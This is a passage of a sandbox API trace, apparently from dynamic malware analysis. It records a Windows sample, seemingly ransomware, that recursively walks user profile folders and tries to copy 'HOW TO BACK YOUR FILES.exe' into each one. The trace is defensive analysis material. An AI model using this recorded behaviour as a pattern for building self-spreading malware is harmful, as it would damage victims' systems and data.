(HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.647] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.647] CloseHandle (hObject=0x120) returned 1 [0104.647] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.647] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.647] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Office\\14.0\\OfficeFileCache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf7a855a0, ftCreationTime.dwHighDateTime=0x1d3373f, ftLastAccessTime.dwLowDateTime=0x6cb585e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cb585e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.648] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.648] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.648] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player" [0104.648] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0104.648] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0104.648] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player") returned 84 [0104.648] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player" [0104.648] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.648] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.649] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.649] GetLastError () returned 0x0 [0104.649] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.649] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.649] CloseHandle (hObject=0x120) returned 1 [0104.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.649] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.649] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4dc14480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dc14480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.649] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.649] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.649] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Transcoded Files Cache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Transcoded Files Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Transcoded Files Cache" [0104.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0104.649] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0104.650] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Transcoded Files Cache") returned 107 [0104.650] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Transcoded Files Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Transcoded Files Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Transcoded Files Cache" [0104.650] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.650] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Transcoded Files Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\media player\\transcoded files cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.650] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.651] GetLastError () returned 0x0 [0104.651] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.651] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.651] CloseHandle (hObject=0x120) returned 1 [0104.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.651] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.651] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Transcoded Files Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf7f22040, ftCreationTime.dwHighDateTime=0x1d3373f, ftLastAccessTime.dwLowDateTime=0x4dc14480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dc14480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.651] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.651] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.651] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0104.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0104.651] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0104.651] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned 99 [0104.651] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0104.651] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.651] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.652] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.652] GetLastError () returned 0x0 [0104.652] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.652] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.652] CloseHandle (hObject=0x120) returned 1 [0104.652] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.652] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.653] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4dc14480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dc14480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.653] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.653] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.653] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0104.653] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0104.653] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0104.653] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned 105 [0104.653] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0104.653] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.653] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.654] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.654] GetLastError () returned 0x0 [0104.654] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.654] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.654] CloseHandle (hObject=0x120) returned 1 [0104.654] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.654] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.654] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4dc3a5e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4dc3a5e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.655] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.655] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.655] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0104.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6cf0 | out: hHeap=0x2b0000) returned 1 [0104.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0104.655] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned 114 [0104.657] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0104.658] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.658] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.658] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.659] GetLastError () returned 0x0 [0104.659] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.659] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.659] CloseHandle (hObject=0x120) returned 1 [0104.659] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.659] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.659] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6cbf0b60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6cbf0b60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.659] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.659] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.659] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713" [0104.659] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0104.659] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0104.659] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713") returned 114 [0104.660] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713" [0104.660] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.660] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\media player\\sync playlists\\en-us\\0000e713\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.660] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.660] GetLastError () returned 0x0 [0104.661] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.661] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.661] CloseHandle (hObject=0x120) returned 1 [0104.661] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.661] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.661] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\0000E713\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2ca96f80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6ccaf240, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6ccaf240, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.661] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.661] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.661] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer" [0104.661] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0104.661] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0104.661] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer") returned 89 [0104.661] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer" [0104.661] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.661] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.662] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.662] GetLastError () returned 0x0 [0104.662] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.662] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.662] CloseHandle (hObject=0x120) returned 1 [0104.662] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0104.662] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.662] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, 